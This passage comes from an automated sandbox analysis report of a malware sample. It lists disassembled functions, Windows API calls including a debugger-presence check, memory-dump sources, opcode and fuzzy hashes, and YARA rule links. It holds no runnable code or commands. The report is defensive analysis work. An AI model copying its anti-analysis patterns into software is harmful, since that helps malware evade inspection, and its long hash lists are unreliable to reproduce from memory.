                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CreateFileFormatName$ModuleTime$AliasConsoleEnvironmentExesNamedNumberObjectPipeProcessShortValueVariable
                                                        • String ID:
                                                        • API String ID: 4163992861-0
                                                        • Opcode ID: 28e90a4a510bfe7e3b0f08d8528c28aed4a345ae12f9b8ca40431f6d3aa5f171
                                                        • Instruction ID: 865e360f6f49b134f00ab6e1a688a8eabde9ded78a542d1afe978d95741ca67a
                                                        • Opcode Fuzzy Hash: 28e90a4a510bfe7e3b0f08d8528c28aed4a345ae12f9b8ca40431f6d3aa5f171
                                                        • Instruction Fuzzy Hash: 2F21A735A40304BBF7109BE1DE4AF997764EB04B12F004066F709B71E0CAB05980CF69
                                                        Function 004072EC Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32 ref: 00409DE3
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00409DF8
                                                        • UnhandledExceptionFilter.KERNEL32(00401B08), ref: 00409E03
                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00409E1F
                                                        • TerminateProcess.KERNEL32(00000000), ref: 00409E26
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                        • String ID:
                                                        • API String ID: 2579439406-0
                                                        • Opcode ID: ae05160693bb474f95fcf57c501156b236d8a4dc90e61670c2a3b0bcb9a5526a
                                                        • Instruction ID: fc7f44277ab07f5b9d60e663852b7e3341cbb747e8bc8937fd2208a62aa489d5
                                                        • Opcode Fuzzy Hash: ae05160693bb474f95fcf57c501156b236d8a4dc90e61670c2a3b0bcb9a5526a
                                                        • Instruction Fuzzy Hash: DB21BFB4C013049FC721DF69F9846583BB4BF5931AF50447AE908972B2E7B4A981CF5E
                                                        Function 0076F4A0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 50f1f6500ce61f8077431c98347a8527c5f1f934838e9231b30eeddca4b7b1fa
                                                        • Instruction ID: 9e957714859fc381b1f1c042a93c622202771d5e147662103616a3fbc63057fb
                                                        • Opcode Fuzzy Hash: 50f1f6500ce61f8077431c98347a8527c5f1f934838e9231b30eeddca4b7b1fa
                                                        • Instruction Fuzzy Hash: A2021B71E002199BDF14CFA9D8806ADBBF1FF48314F25826AD81AE7345D735AE418B90
                                                        Function 00406215 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000061D3), ref: 0040621A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 7fb13b1f3b4b6684cb4463f531fd3299373ff627bc319735b2c060279e1a2c61
                                                        • Instruction ID: 21803e78a00e134a1eeb61ef662395532919293461547adaa6da1f77d99b5aa0
                                                        • Opcode Fuzzy Hash: 7fb13b1f3b4b6684cb4463f531fd3299373ff627bc319735b2c060279e1a2c61
                                                        • Instruction Fuzzy Hash: 089002706511224AD60517705D0D6063590AA6D78775244717512FC0A5DAB44011551A
                                                        Function 00767E44 Relevance: .4, Instructions: 356COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 00d6ba4a2d84f0801e1b0a96c170955ef3db55fa66fb4acd58968073f34e18d5
                                                        • Instruction ID: a17ed38dbe0a9ce99db0aa61d18d48d1e2055cc390476d406be6a17f40d3c1c3
                                                        • Opcode Fuzzy Hash: 00d6ba4a2d84f0801e1b0a96c170955ef3db55fa66fb4acd58968073f34e18d5
                                                        • Instruction Fuzzy Hash: 02D1E73220C1E34ECBAD4A39847043ABFE16A523A131D479DECF7CB5C2ED28D954D661
                                                        Function 0077767F Relevance: .3, Instructions: 269COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                        • Instruction ID: be4dd53f6fa57eb407a45b928d1b4153ba76426b6d5a3552282c14b3f9dfa766
                                                        • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                        • Instruction Fuzzy Hash: B9B14B356146099FDB19CF28C48AB657BE0FF053A4F25C658E999CF2A1C339E991CB40
                                                        Function 00768727 Relevance: .3, Instructions: 254COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                        • Instruction ID: 97dd73ef9bfe26e83b2180d497d78a17669f703f761b6c591eeda77e960412e9
                                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                        • Instruction Fuzzy Hash: 9A9162722091E34EDBAD467A853403EFFE15A523A131A079EDCF3DB1C1EE28D954D622
                                                        Function 007689E2 Relevance: .2, Instructions: 244COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                        • Instruction ID: 464b6efcd421db7aaa2638152dbdcf33a275448c993d9a7ec586de8c22b87a21
                                                        • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                        • Instruction Fuzzy Hash: 5F9153B21090E30ADBA94679857403EFFE15A523A131E479EDCF7CB1C5EE28C964E631
                                                        Function 00768460 Relevance: .2, Instructions: 240COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                        • Instruction ID: 85c29f5c456c070919ef9395e66b269f94c4c4a51bc2de068896cd52fd6e87c3
                                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                        • Instruction Fuzzy Hash: 289144722090E34EDBAD467EC57403EFFE15A523A131A079EECF3CA1C6ED28C5649621
                                                        Function 0076DEAE Relevance: .2, Instructions: 237COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                        • Instruction ID: f07b7c5bcbd6009696ffd7bab876b3b616f8fda97ec738de7e31a9448b600354
                                                        • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                        • Instruction Fuzzy Hash: 3C618875F20708E7DA385A688CA9BFE2394AF41700F64091AFC93DF2C1D69DDD428765
                                                        Function 007681B6 Relevance: .2, Instructions: 232COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                        • Instruction ID: 3ab14c65f5e1639ae7453576c0237207fe0538d0d0b757e934eb759a1563ded5
                                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                        • Instruction Fuzzy Hash: 2F8184722090E34EDBAD463E857443EFFE16A527A131A079EDCF3CA5C1EE28C954D621
                                                        Function 00768F20 Relevance: .1, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                        • Instruction ID: 27115bbc5cc72c13264320eb2a572b952dafba2c1556e87c4eb2a91a2e4fce42
                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                        • Instruction Fuzzy Hash: ED112B7720414147E6848A3DD4B45F7E3A7EBC6321F2C477AE8438B758DA3AE9459602
                                                        Function 00740042 Relevance: .1, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                        • Instruction ID: 9d0ef730dc3b98e47b3e81b4e7a45dae8ab0018f5a3b344e971404ec5f650753
                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                        • Instruction Fuzzy Hash: 801170723401009FD754DE65DC95FA673EAEB88320B298155EA08CB322D779EC01C7A0
                                                        Function 005F0083 Relevance: .1, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708924923.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5f0000_VAIIBIHmtT.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                        • Instruction ID: aee63bfc0ebe0275777682fff527ab4a09e6e9e666620f5f6216fbf1e24b7687
                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                        • Instruction Fuzzy Hash: 4611A0723401049FD740DF55DCC5FA677EAFB88320B298065EE04CB356D679E801C760
                                                        Function 0077081F Relevance: .0, Instructions: 21COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0b3940eec2b2cd11d836b6e6cdb7d98a3528c1136410bfb24a116e7c525e7d2
                                                        • Instruction ID: 52ce3c714552484250a4b9feed960a1c171866ac7f348919e63cf75285992830
                                                        • Opcode Fuzzy Hash: b0b3940eec2b2cd11d836b6e6cdb7d98a3528c1136410bfb24a116e7c525e7d2
                                                        • Instruction Fuzzy Hash: 70E0B635000648EFCF116F94DD4DF593B69EF52B92F048428F9099B622CB79DE52CAC5
                                                        Function 0076F072 Relevance: 21.3, APIs: 14, Instructions: 296COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                        • Instruction ID: be9b0287bd5aae67037b9e63c3d52d430ae8fe4d0d984197595269114553b0fc
                                                        • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                        • Instruction Fuzzy Hash: 6CB17EB1900205DFDB11DF79D885BEEBBF4FF08300F14456DF85AA7242EA79A9419B60
                                                        Function 00403582 Relevance: 19.7, APIs: 13, Instructions: 181COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _malloc.LIBCMT ref: 00403598
                                                          • Part of subcall function 00403385: __FF_MSGBANNER.LIBCMT ref: 004033A8
                                                          • Part of subcall function 00403385: __NMSG_WRITE.LIBCMT ref: 004033AF
                                                          • Part of subcall function 00403385: HeapAlloc.KERNEL32(00000000,74DEDF91,00000001,00000000,00000000,?,00407FC8,74DEDFA0,00000001,74DEDFA0,?,004047A6,00000018,004562F0,0000000C,00404837), ref: 004033FC
                                                          • Part of subcall function 00405A8A: __getptd_noexit.LIBCMT ref: 00405A8A
                                                        • GetLastError.KERNEL32(00456288,00000010,00402B65,00000000,00000000), ref: 004036FD
                                                        • GetLastError.KERNEL32 ref: 0040378A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$AllocHeap__getptd_noexit_malloc
                                                        • String ID:
                                                        • API String ID: 2418675476-0
                                                        • Opcode ID: ebe4d2f4a6aa2f5db6c5fe1750b8a58926c4906cb4d1942648c70c98404e1576
                                                        • Instruction ID: 366ded926e0d4f8fef6445729b2551892b825c474475e8074114dc2f3c4b7eb5
                                                        • Opcode Fuzzy Hash: ebe4d2f4a6aa2f5db6c5fe1750b8a58926c4906cb4d1942648c70c98404e1576
                                                        • Instruction Fuzzy Hash: DD51B0F1D00614AADB317F659C4466F7E6CEB50766B208A3BF814BB2D1D73C8A018E9D
                                                        Function 0077AFB8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 0077AFF1
                                                        • ___free_lconv_mon.LIBCMT ref: 0077AFFC
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A368
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A37A
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A38C
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A39E
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A3B0
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A3C2
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A3D4
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A3E6
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A3F8
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A40A
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A41C
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A42E
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A440
                                                        • _free.LIBCMT ref: 0077B013
                                                        • _free.LIBCMT ref: 0077B028
                                                        • _free.LIBCMT ref: 0077B033
                                                        • _free.LIBCMT ref: 0077B055
                                                        • _free.LIBCMT ref: 0077B068
                                                        • _free.LIBCMT ref: 0077B076
                                                        • _free.LIBCMT ref: 0077B081
                                                        • _free.LIBCMT ref: 0077B0B9
                                                        • _free.LIBCMT ref: 0077B0C0
                                                        • _free.LIBCMT ref: 0077B0DD
                                                        • _free.LIBCMT ref: 0077B0F5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free$___free_lconv_mon
                                                        • String ID:
                                                        • API String ID: 3658870901-0
                                                        • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                        • Instruction ID: 14fb5820862013e7fae15f5e845e84a3a52484ab10ef53c70bb9267ced859ed6
                                                        • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                        • Instruction Fuzzy Hash: 9B314831600604DEEF21AA78D849B6B77E8EF043A0F10C42EE46DDB151EF79AE51D720
                                                        Function 0076137F Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 136threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 007613F6
                                                        • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 00761413
                                                        • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 00761479
                                                        • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 0076148E
                                                        • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 007614A0
                                                        • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 007614CE
                                                        • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 007614D9
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00761505
                                                        • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 00761515
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$Base::ContextInternal$Work$Chore$AssociatedCompletionCreateCurrentException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThreadThrowTransferWait
                                                        • String ID: %D
                                                        • API String ID: 1102740027-2104738290
                                                        • Opcode ID: 6daf059359ebdef5a4ede7147139a3b2708b04212e06e16dc02b70a899e44c79
                                                        • Instruction ID: 6a91a358a6d9c7401e20deebdbeac17540b9c2f556300524ff15ca257da17516
                                                        • Opcode Fuzzy Hash: 6daf059359ebdef5a4ede7147139a3b2708b04212e06e16dc02b70a899e44c79
                                                        • Instruction Fuzzy Hash: BE415B30A04244DADF15EBA4845D7ED7AA16F41301F9840A9EC476B293CF6C9A0ACBA1
                                                        Function 00755AFE Relevance: 15.2, APIs: 10, Instructions: 175COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00755C09
                                                          • Part of subcall function 0075561A: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 0075562E
                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00755C32
                                                          • Part of subcall function 00753A94: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00753AB0
                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00755C59
                                                        • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00755B13
                                                          • Part of subcall function 00753AF8: __EH_prolog3_GS.LIBCMT ref: 00753AFF
                                                          • Part of subcall function 00753AF8: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00753B47
                                                        • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00755B34
                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00755B6B
                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00755BAE
                                                        • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00755CA1
                                                        • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00755CC5
                                                        • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00755CD2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$Manager::Resource$Affinity$ApplyRestrictions$Information$Topology$CaptureHardwareProcess$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalProcessorRestriction::
                                                        • String ID:
                                                        • API String ID: 2324067391-0
                                                        • Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                        • Instruction ID: 6c83d71a5246b26546f4a7c9d1ff53dea0944e33c758517a602258056bf3e20f
                                                        • Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                        • Instruction Fuzzy Hash: 4A619C71900702DFDB18CF64E8E66ADB7A1FB04303F24803DE84697292C7B9A949CB58
                                                        Function 007727A6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                        • Instruction ID: 28ac3cc3da3b00e9f8ddc1ee86bf18f03929b8068543c3bcc99659d96a2ac354
                                                        • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                        • Instruction Fuzzy Hash: E911A476100508EFCF01EF54D856CD93BA5EF043A0B11D0A9FA0C8B222EA75DF51AB80
                                                        Function 00771882 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID: C
                                                        • API String ID: 269201875-1037565863
                                                        • Opcode ID: e4287537c326013098f7752669636024e1d85bc84a09542dbdc65a1d0fc5e3df
                                                        • Instruction ID: 3880dcaacd5beabec7441526b5502c7ec2b1d3163edd44ec9bfe7e728fc2e605
                                                        • Opcode Fuzzy Hash: e4287537c326013098f7752669636024e1d85bc84a09542dbdc65a1d0fc5e3df
                                                        • Instruction Fuzzy Hash: 52B12675A0121ADFDF24DF18C888AADB7B4FB08354F5085EAE94DA7250E775AE90CF40
                                                        Function 0077A86E Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                        • Instruction ID: 3881599d614559af831b14b2da991b042893cb6bb90efcca848575dcaeb6ea7c
                                                        • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
